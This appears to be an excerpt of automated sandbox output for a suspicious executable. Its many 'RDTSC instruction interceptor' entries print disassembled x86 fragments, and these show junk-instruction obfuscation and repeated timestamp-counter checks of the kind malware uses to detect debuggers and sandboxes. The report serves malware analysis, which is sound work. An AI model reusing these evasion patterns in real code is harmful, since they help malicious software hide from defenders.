Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53607D8 second address: 5360844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1BE47673D1h 0x00000009 add si, 4956h 0x0000000e jmp 00007F1BE47673D1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F1BE47673D0h 0x0000001a sub si, BB78h 0x0000001f jmp 00007F1BE47673CBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xor eax, dword ptr [ebp+08h] 0x0000002b jmp 00007F1BE47673CFh 0x00000030 and ecx, 1Fh 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360844 second address: 536085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC077h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536085F second address: 5360886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ror eax, cl 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BE47673D9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360886 second address: 5360931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007F1BE4ECC06Eh 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [00AF2014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007F1BE977C853h 0x0000002a push FFFFFFFEh 0x0000002c pushad 0x0000002d call 00007F1BE4ECC06Eh 0x00000032 pushfd 0x00000033 jmp 00007F1BE4ECC072h 0x00000038 add esi, 65199F58h 0x0000003e jmp 00007F1BE4ECC06Bh 0x00000043 popfd 0x00000044 pop esi 0x00000045 pushfd 0x00000046 jmp 00007F1BE4ECC079h 0x0000004b xor al, FFFFFFF6h 0x0000004e jmp 00007F1BE4ECC071h 0x00000053 popfd 0x00000054 popad 0x00000055 pop eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F1BE4ECC078h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360931 second address: 5360940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360940 second address: 5360946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360946 second address: 536094A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536094A second address: 5360994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007F1BE977C8F2h 0x00000010 mov edi, edi 0x00000012 jmp 00007F1BE4ECC077h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F1BE4ECC076h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F1BE4ECC06Eh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360994 second address: 53609E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1BE47673D4h 0x00000011 and esi, 5AA42D98h 0x00000017 jmp 00007F1BE47673CBh 0x0000001c popfd 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F1BE47673CCh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53609E1 second address: 53609E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53609E7 second address: 5360A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1BE47673CCh 0x00000009 and ax, AF28h 0x0000000e jmp 00007F1BE47673CBh 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1BE47673D1h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360A21 second address: 5360A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310034 second address: 5310043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310043 second address: 5310052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, al 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310052 second address: 5310056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310056 second address: 531005C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531005C second address: 531009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F1BE47673CCh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F1BE47673D1h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cx, bx 0x0000001c call 00007F1BE47673CFh 0x00000021 pop esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531009C second address: 53100C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BE4ECC06Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53100C7 second address: 53100D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53100D6 second address: 5310100 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push edi 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F1BE4ECC06Ah 0x00000011 mov dword ptr [esp], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F1BE4ECC06Dh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310100 second address: 53101C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7E902CE9h 0x00000008 jmp 00007F1BE47673D6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F1BE47673D0h 0x00000016 push eax 0x00000017 jmp 00007F1BE47673CBh 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e mov edi, eax 0x00000020 pushfd 0x00000021 jmp 00007F1BE47673D0h 0x00000026 adc si, 4348h 0x0000002b jmp 00007F1BE47673CBh 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+10h] 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F1BE47673D4h 0x0000003c sbb ecx, 38B505A8h 0x00000042 jmp 00007F1BE47673CBh 0x00000047 popfd 0x00000048 pushfd 0x00000049 jmp 00007F1BE47673D8h 0x0000004e and cl, 00000008h 0x00000051 jmp 00007F1BE47673CBh 0x00000056 popfd 0x00000057 popad 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push edx 0x0000005d pop esi 0x0000005e mov si, di 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53101C3 second address: 53101F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F1BE4ECC072h 0x0000000b xor ah, FFFFFF98h 0x0000000e jmp 00007F1BE4ECC06Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d mov ch, F1h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53101F6 second address: 531022C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 jmp 00007F1BE47673D4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BE47673D7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531022C second address: 531024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC06Fh 0x00000008 movzx esi, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531024D second address: 5310253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310253 second address: 53102AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov edx, 04197694h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F1BE4ECC076h 0x00000015 pushfd 0x00000016 jmp 00007F1BE4ECC072h 0x0000001b sbb al, 00000078h 0x0000001e jmp 00007F1BE4ECC06Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], edi 0x00000028 pushad 0x00000029 mov bl, al 0x0000002b popad 0x0000002c test esi, esi 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53102AA second address: 53102D0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1BE47673D4h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F1BE47673CBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53102D0 second address: 53102EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 je 00007F1C56ADA3A5h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BE4ECC070h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53102EE second address: 531034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F1BE47673D6h 0x00000015 je 00007F1C563756D7h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1BE47673CDh 0x00000024 or si, 6636h 0x00000029 jmp 00007F1BE47673D1h 0x0000002e popfd 0x0000002f mov ecx, 4A71CE27h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531034E second address: 531036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC078h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531036A second address: 531036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531036E second address: 53103EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1BE4ECC06Dh 0x00000012 sbb cx, 38F6h 0x00000017 jmp 00007F1BE4ECC071h 0x0000001c popfd 0x0000001d mov cx, 79E7h 0x00000021 popad 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 jmp 00007F1BE4ECC06Ah 0x0000002a test edx, 61000000h 0x00000030 pushad 0x00000031 push esi 0x00000032 pushfd 0x00000033 jmp 00007F1BE4ECC06Dh 0x00000038 or ecx, 32B51506h 0x0000003e jmp 00007F1BE4ECC071h 0x00000043 popfd 0x00000044 pop ecx 0x00000045 mov esi, edx 0x00000047 popad 0x00000048 jne 00007F1C56ADA30Bh 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53103EF second address: 53103F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53103F5 second address: 5310436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC077h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007F1BE4ECC076h 0x00000012 jne 00007F1C56ADA2DDh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov bx, si 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300901 second address: 5300906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300906 second address: 5300948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC06Dh 0x00000008 mov bx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1BE4ECC06Ah 0x00000015 and esp, FFFFFFF8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx ebx, si 0x0000001e jmp 00007F1BE4ECC076h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300948 second address: 530094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 530094D second address: 530099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1BE4ECC077h 0x0000000a xor cx, B1FEh 0x0000000f jmp 00007F1BE4ECC079h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1BE4ECC06Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 530099B second address: 53009AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE47673CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53009AB second address: 5300A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F1BE4ECC079h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F1BE4ECC06Eh 0x00000017 xchg eax, esi 0x00000018 jmp 00007F1BE4ECC070h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F1BE4ECC06Ch 0x00000027 adc si, 5818h 0x0000002c jmp 00007F1BE4ECC06Bh 0x00000031 popfd 0x00000032 movzx ecx, bx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300A1C second address: 5300A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300A22 second address: 5300AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a push eax 0x0000000b mov bx, C278h 0x0000000f pop ebx 0x00000010 pushfd 0x00000011 jmp 00007F1BE4ECC06Eh 0x00000016 and eax, 2DB1B9A8h 0x0000001c jmp 00007F1BE4ECC06Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 jmp 00007F1BE4ECC076h 0x0000002b sub ebx, ebx 0x0000002d jmp 00007F1BE4ECC071h 0x00000032 test esi, esi 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F1BE4ECC06Ch 0x0000003b or cx, 4E68h 0x00000040 jmp 00007F1BE4ECC06Bh 0x00000045 popfd 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300AA5 second address: 5300AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300AA9 second address: 5300AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300AAD second address: 5300AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F1C5637CCA0h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1BE47673D7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300AD3 second address: 5300B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 566Ah 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000013 jmp 00007F1BE4ECC06Dh 0x00000018 mov ecx, esi 0x0000001a jmp 00007F1BE4ECC06Eh 0x0000001f je 00007F1C56AE1906h 0x00000025 pushad 0x00000026 mov cl, 79h 0x00000028 mov bx, 4C6Eh 0x0000002c popad 0x0000002d test byte ptr [76FA6968h], 00000002h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 movzx eax, dx 0x0000003a pushfd 0x0000003b jmp 00007F1BE4ECC073h 0x00000040 xor esi, 18A399CEh 0x00000046 jmp 00007F1BE4ECC079h 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300B53 second address: 5300B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300B59 second address: 5300B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F1C56AE18BBh 0x0000000e jmp 00007F1BE4ECC06Fh 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1BE4ECC070h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300B8D second address: 5300B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300B9C second address: 5300BCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov ah, DBh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F1BE4ECC078h 0x00000011 mov dword ptr [esp], ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop eax 0x00000019 movsx ebx, ax 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300BCC second address: 5300BE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300BE2 second address: 5300BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300BE6 second address: 5300BEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300BEC second address: 5300C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, F3E0h 0x00000011 pushfd 0x00000012 jmp 00007F1BE4ECC079h 0x00000017 sbb ch, FFFFFFE6h 0x0000001a jmp 00007F1BE4ECC071h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 pushad 0x00000024 mov dh, ah 0x00000026 popad 0x00000027 mov dh, 86h 0x00000029 popad 0x0000002a push dword ptr [ebp+14h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300C3F second address: 5300C4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300C4E second address: 5300C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC074h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300CD1 second address: 5300CFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b pushad 0x0000000c mov esi, 0AF3E103h 0x00000011 push eax 0x00000012 push edx 0x00000013 mov cl, FDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300CFA second address: 5300D66 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1BE4ECC06Bh 0x00000008 sbb ch, FFFFFFAEh 0x0000000b jmp 00007F1BE4ECC079h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 pop ebp 0x00000015 pushad 0x00000016 call 00007F1BE4ECC06Ch 0x0000001b pushfd 0x0000001c jmp 00007F1BE4ECC072h 0x00000021 jmp 00007F1BE4ECC075h 0x00000026 popfd 0x00000027 pop esi 0x00000028 push eax 0x00000029 push edx 0x0000002a mov bx, 7BD2h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C81 second address: 5310C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C8E second address: 5310C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C92 second address: 5310C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C96 second address: 5310C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310C9C second address: 5310CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310CA2 second address: 5310CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53109EB second address: 5310A0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, ah 0x0000000d push ebx 0x0000000e mov al, 50h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A0E second address: 5310A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A12 second address: 5310A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A16 second address: 5310A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310A1C second address: 5310A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
